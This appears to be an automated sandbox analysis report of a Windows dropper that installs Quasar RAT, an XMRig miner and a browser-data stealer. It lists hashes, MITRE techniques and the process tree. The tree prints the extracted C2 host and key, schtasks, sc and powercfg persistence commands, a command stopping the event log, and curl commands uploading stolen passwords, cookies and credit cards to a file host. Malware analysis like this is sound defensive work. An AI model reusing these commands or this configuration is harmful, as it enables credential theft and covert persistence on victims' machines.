quasar | 5edd8c757e0ae3da04b5c3966457e168027b44d20aeeda2a38e9d097c68a2afd

Analysis

max time kernel
82s
max time network
85s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 15:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sigmasoft3.exe
Size

15.6MB
MD5

062376a7456904b683c2a9c862beacb3
SHA1

d475f177f6e85c9fb7cde1d4b5b7e793f6768d1f
SHA256

5edd8c757e0ae3da04b5c3966457e168027b44d20aeeda2a38e9d097c68a2afd
SHA512

0b5e207af9bdebe439fba7668da43376d9e5a883c0084eaa2376458cccf4d9b23b6af16b48fcbe90eb6b3e7ca1f0df517fd0da1e0ac78add748a8eaead659233
SSDEEP

393216:tZZBDmZ18TyLDEaBRput5NtMjy/yfK63vJZp:TZBbTNOpAGjy/WLbp

Score

10^/10

quasar xmrig office04 credential_access discovery evasion execution miner persistence pyinstaller spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

gorodpro-37914.portmap.host:37914

Mutex

1c5ec883-e96d-4a3a-9035-7a940d47aeb7

Attributes

encryption_key
99E87F88E9E967A51725453CB8223ADDB8256DE2
install_name
WindowsDefender.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Defender
subdirectory
WindowsDefender

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe	family_quasar
behavioral1/memory/5116-17-0x00000000000F0000-0x0000000000414000-memory.dmp	family_quasar

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2616-91-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-126-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-128-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-127-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-124-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-123-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-90-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-213-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2616-214-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sigmasoft3.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	sigmasoft3.exe

Drops startup file 1 IoCs

Processes:

ss-a2.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ss-a2.exe ss-a2.exe
Executes dropped EXE 6 IoCs

Processes:

ss.exeWindowsDefender.exess-a.exegmstcccpdzbb.exess-a2.exess-a2.exe

pid process

5116 ss.exe
1176 WindowsDefender.exe
1020 ss-a.exe
2256 gmstcccpdzbb.exe
556 ss-a2.exe
2200 ss-a2.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ss-a2.exe	ss-a2.exe

pid	process
5116	ss.exe
1176	WindowsDefender.exe
1020	ss-a.exe
2256	gmstcccpdzbb.exe
556	ss-a2.exe
2200	ss-a2.exe

Loads dropped DLL 38 IoCs

Processes:

ss-a2.exe

pid	process
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe
2200	ss-a2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 36 IoCs

Web Service

T1102

Processes:

flow	ioc
120	discord.com
65	raw.githubusercontent.com
68	raw.githubusercontent.com
71	raw.githubusercontent.com
106	discord.com
53	discord.com
56	discord.com
36	discord.com
37	discord.com
112	discord.com
117	discord.com
124	discord.com
126	discord.com
69	raw.githubusercontent.com
111	discord.com
118	discord.com
121	discord.com
107	discord.com
38	discord.com
60	discord.com
76	raw.githubusercontent.com
104	discord.com
75	raw.githubusercontent.com
116	discord.com
42	discord.com
61	raw.githubusercontent.com
66	raw.githubusercontent.com
70	raw.githubusercontent.com
127	discord.com
62	raw.githubusercontent.com
74	raw.githubusercontent.com
108	discord.com
109	discord.com
40	discord.com
55	discord.com
110	discord.com

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 api.ipify.org
30 api.ipify.org
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

1748 powercfg.exe
844 powercfg.exe
3828 powercfg.exe
1688 powercfg.exe
3984 powercfg.exe
4556 powercfg.exe
5004 powercfg.exe
3860 powercfg.exe

flow	ioc
29	api.ipify.org
30	api.ipify.org

pid	process
1748	powercfg.exe
844	powercfg.exe
3828	powercfg.exe
1688	powercfg.exe
3984	powercfg.exe
4556	powercfg.exe
5004	powercfg.exe
3860	powercfg.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

gmstcccpdzbb.exe

description	pid	process	target process
PID 2256 set thread context of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 set thread context of 2616	2256	gmstcccpdzbb.exe	conhost.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2616-65-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-86-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-88-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-91-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-126-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-128-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-127-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-124-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-123-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-90-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-87-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-59-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-213-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2616-214-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1264 sc.exe
2396 sc.exe
2880 sc.exe
4364 sc.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

pid	process
1264	sc.exe
2396	sc.exe
2880	sc.exe
4364	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a2.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 4 IoCs

Processes:

conhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3916 schtasks.exe
404 schtasks.exe

pid	process
3916	schtasks.exe
404	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ss-a.exegmstcccpdzbb.execonhost.exe

pid	process
1020	ss-a.exe
1020	ss-a.exe
1020	ss-a.exe
1020	ss-a.exe
1020	ss-a.exe
1020	ss-a.exe
1020	ss-a.exe
1020	ss-a.exe
2256	gmstcccpdzbb.exe
2256	gmstcccpdzbb.exe
2256	gmstcccpdzbb.exe
2256	gmstcccpdzbb.exe
2256	gmstcccpdzbb.exe
2256	gmstcccpdzbb.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe
2616	conhost.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

ss.exeWindowsDefender.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	5116	ss.exe
Token: SeDebugPrivilege	1176	WindowsDefender.exe
Token: SeShutdownPrivilege	844	powercfg.exe
Token: SeCreatePagefilePrivilege	844	powercfg.exe
Token: SeShutdownPrivilege	5004	powercfg.exe
Token: SeCreatePagefilePrivilege	5004	powercfg.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeCreatePagefilePrivilege	1748	powercfg.exe
Token: SeShutdownPrivilege	3860	powercfg.exe
Token: SeCreatePagefilePrivilege	3860	powercfg.exe
Token: SeShutdownPrivilege	3984	powercfg.exe
Token: SeCreatePagefilePrivilege	3984	powercfg.exe
Token: SeShutdownPrivilege	4556	powercfg.exe
Token: SeCreatePagefilePrivilege	4556	powercfg.exe
Token: SeShutdownPrivilege	1688	powercfg.exe
Token: SeCreatePagefilePrivilege	1688	powercfg.exe
Token: SeLockMemoryPrivilege	2616	conhost.exe
Token: SeShutdownPrivilege	3828	powercfg.exe
Token: SeCreatePagefilePrivilege	3828	powercfg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WindowsDefender.exe

pid process

1176 WindowsDefender.exe

pid	process
1176	WindowsDefender.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

sigmasoft3.exess.exeWindowsDefender.exegmstcccpdzbb.exess-a2.exess-a2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4596 wrote to memory of 5116	4596	sigmasoft3.exe	ss.exe
PID 4596 wrote to memory of 5116	4596	sigmasoft3.exe	ss.exe
PID 5116 wrote to memory of 3916	5116	ss.exe	schtasks.exe
PID 5116 wrote to memory of 3916	5116	ss.exe	schtasks.exe
PID 5116 wrote to memory of 1176	5116	ss.exe	WindowsDefender.exe
PID 5116 wrote to memory of 1176	5116	ss.exe	WindowsDefender.exe
PID 4596 wrote to memory of 1020	4596	sigmasoft3.exe	ss-a.exe
PID 4596 wrote to memory of 1020	4596	sigmasoft3.exe	ss-a.exe
PID 1176 wrote to memory of 404	1176	WindowsDefender.exe	schtasks.exe
PID 1176 wrote to memory of 404	1176	WindowsDefender.exe	schtasks.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 4596 wrote to memory of 556	4596	sigmasoft3.exe	ss-a2.exe
PID 4596 wrote to memory of 556	4596	sigmasoft3.exe	ss-a2.exe
PID 2256 wrote to memory of 2612	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2616	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2616	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2616	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2616	2256	gmstcccpdzbb.exe	conhost.exe
PID 2256 wrote to memory of 2616	2256	gmstcccpdzbb.exe	conhost.exe
PID 556 wrote to memory of 2200	556	ss-a2.exe	ss-a2.exe
PID 556 wrote to memory of 2200	556	ss-a2.exe	ss-a2.exe
PID 2200 wrote to memory of 7320	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 7320	2200	ss-a2.exe	cmd.exe
PID 7320 wrote to memory of 7372	7320	cmd.exe	curl.exe
PID 7320 wrote to memory of 7372	7320	cmd.exe	curl.exe
PID 2200 wrote to memory of 7760	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 7760	2200	ss-a2.exe	cmd.exe
PID 7760 wrote to memory of 7812	7760	cmd.exe	curl.exe
PID 7760 wrote to memory of 7812	7760	cmd.exe	curl.exe
PID 2200 wrote to memory of 7872	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 7872	2200	ss-a2.exe	cmd.exe
PID 7872 wrote to memory of 7924	7872	cmd.exe	curl.exe
PID 7872 wrote to memory of 7924	7872	cmd.exe	curl.exe
PID 2200 wrote to memory of 8064	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 8064	2200	ss-a2.exe	cmd.exe
PID 8064 wrote to memory of 8120	8064	cmd.exe	curl.exe
PID 8064 wrote to memory of 8120	8064	cmd.exe	curl.exe
PID 2200 wrote to memory of 5004	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 5004	2200	ss-a2.exe	cmd.exe
PID 5004 wrote to memory of 3104	5004	cmd.exe	curl.exe
PID 5004 wrote to memory of 3104	5004	cmd.exe	curl.exe
PID 2200 wrote to memory of 2656	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 2656	2200	ss-a2.exe	cmd.exe
PID 2656 wrote to memory of 548	2656	cmd.exe	curl.exe
PID 2656 wrote to memory of 548	2656	cmd.exe	curl.exe
PID 2200 wrote to memory of 4260	2200	ss-a2.exe	cmd.exe
PID 2200 wrote to memory of 4260	2200	ss-a2.exe	cmd.exe
PID 4260 wrote to memory of 452	4260	cmd.exe	curl.exe
PID 4260 wrote to memory of 452	4260	cmd.exe	curl.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\sigmasoft3.exe
"C:\Users\Admin\AppData\Local\Temp\sigmasoft3.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows Defender" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3916
- - C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe
    "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Defender" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:404
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1020
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3860
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:844
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "XLZQHCLS"
    3⤵
    - Launches sc.exe
    PID:1264
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2396
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2880
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "XLZQHCLS"
    3⤵
    - Launches sc.exe
    PID:4364
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a2.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a2.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:7320
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"
        5⤵
        
        PID:7372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:7760
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"
        5⤵
        
        PID:7812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:7872
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
        5⤵
        
        PID:7924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:8064
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt"
        5⤵
        
        PID:8120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5004
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt"
        5⤵
        
        PID:3104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2656
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt"
        5⤵
        
        PID:548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin/Downloads/SubmitBackup.cmd""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4260
    - - C:\Windows\system32\curl.exe
        
        curl -X POST "https://store5.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin/Downloads/SubmitBackup.cmd"
        5⤵
        
        PID:452

C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3984
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1688
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3828
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2612
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a.exe

Filesize
5.0MB

MD5
8cd64540e579ed3add4ee8f77615367d

SHA1
1581bc9c7f6fe0539fd9f4719eb0041c9433205f

SHA256
eb6e35374536bf45bdbd5795cb14752751632e77dbe1e126d8c3daf66a4ae894

SHA512
5b62686686323ea3f0615870628e715ba3b1206f3d1922c5a2740bc17492abbdd4415847be5bf47b263582ffb93898ae9be9cfc7a18729dc548cb429676e9675

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss-a2.exe

Filesize
10.3MB

MD5
e2d08bbf721ac5a0ff56926e1b2eedf5

SHA1
fc8a583f271fd19d2be0c1133e8f9f54c673ed1f

SHA256
1008886e802431d1c74e854382ee10d6a0fb7a4e9a54da980662aa3c0bce95fe

SHA512
9888817d2b9d44abbd2e4e461854f04c445b416c21a6526ef0041d82d577ad3a95d1fe90c7eefabe5f3d601363d336153eb1f20f75487d64b7fa327151507634

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

Filesize
3.1MB

MD5
78859f6e8d39f50e6470af9112d61afd

SHA1
e34aef15bfcfcd3066f90e33cecffced76422aaa

SHA256
30f2e4ca621ecdb886fba8ce596d07090d1730bfcec91112d9011bfb58270f81

SHA512
14ea0a38210bb1da5b09069b0e95e8800b24941bc4bc5f3bb957eb675ff53757eb0ae9aae53c31fa007197e9cc65cd4a183dfb36f7c96e3ab85e3daf65b25756

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5562\Crypto\Cipher\_raw_cbc.pyd

Filesize
12KB

MD5
40390f2113dc2a9d6cfae7127f6ba329

SHA1
9c886c33a20b3f76b37aa9b10a6954f3c8981772

SHA256
6ba9c910f755885e4d356c798a4dd32d2803ea4cfabb3d56165b3017d0491ae2

SHA512
617b963816838d649c212c5021d7d0c58839a85d4d33bbaf72c0ec6ecd98b609080e9e57af06fa558ff302660619be57cc974282826ab9f21ae0d80fbaa831a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5562\Crypto\Cipher\_raw_cfb.pyd

Filesize
12KB

MD5
899895c0ed6830c4c9a3328cc7df95b6

SHA1
c02f14ebda8b631195068266ba20e03210abeabc

SHA256
18d568c7be3e04f4e6026d12b09b1fa3fae50ff29ac3deaf861f3c181653e691

SHA512
0b4c50e40af92bc9589668e13df417244274f46f5a66e1fc7d1d59bc281969ba319305becea119385f01cc4603439e4b37afa2cf90645425210848a02839e3e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5562\Crypto\Cipher\_raw_ctr.pyd

Filesize
14KB

MD5
c4c525b081f8a0927091178f5f2ee103

SHA1
a1f17b5ea430ade174d02ecc0b3cb79dbf619900

SHA256
4d86a90b2e20cde099d6122c49a72bae081f60eb2eea0f76e740be6c41da6749

SHA512
7c06e3e6261427bc6e654b2b53518c7eaa5f860a47ae8e80dc3f8f0fed91e122cb2d4632188dc44123fb759749b5425f426cd1153a8f84485ef0491002b26555

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI5562\Crypto\Cipher\_raw_ecb.pyd

Filesize
10KB

MD5
80bb1e0e06acaf03a0b1d4ef30d14be7

SHA1
b20cac0d2f3cd803d98a2e8a25fbf65884b0b619

SHA256
5d1c2c60c4e571b88f27d4ae7d22494bed57d5ec91939e5716afa3ea7f6871f6

SHA512
